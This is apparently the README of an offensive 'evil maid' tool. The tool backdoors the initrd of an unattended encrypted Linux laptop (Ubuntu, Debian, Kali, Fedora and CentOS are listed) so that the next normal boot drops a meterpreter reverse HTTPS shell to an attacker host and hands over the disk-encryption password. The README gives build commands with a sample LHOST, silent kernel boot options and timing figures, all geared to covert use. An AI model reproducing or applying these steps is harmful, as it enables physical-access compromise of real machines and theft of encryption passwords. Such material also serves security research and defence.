Scenario

Laptop left turned off with FDE turned on

Attacker boots from USB/CD/Network

Script executes and backdoors initrd

User returns to laptop, boots as normal

Backdoored initrd loads: (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment , loaded globally, dropping a shell.



Supported Distros

Ubuntu 14.04.3

Debian 8.2.0

Kali 2.0

Fedora 23

CentOS 7

Current Features

python/meterpreter/reverse_https to compile time LHOST

FDE decryption password stored in meterpreter environment ( getenv PASSWORD )

Details

Compiling

See the Makefile for more information/configuration, LHOST is required in the environment to build the .so as msfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.

Generic Instructions (builds iso image in cwd): LHOST=192.168.56.101 make rev.so iso

The following options have been appended to the kernel boot:

mc superuser nodhcp quiet loglevel=0

Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing

Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)

Prerequisites

core.d is an unpacked core.gz from TinyCore with the below packages merged in.

Core-current is an unpacked Core-current.iso

The following packages have been installed inside tinycore (python, filesystem support):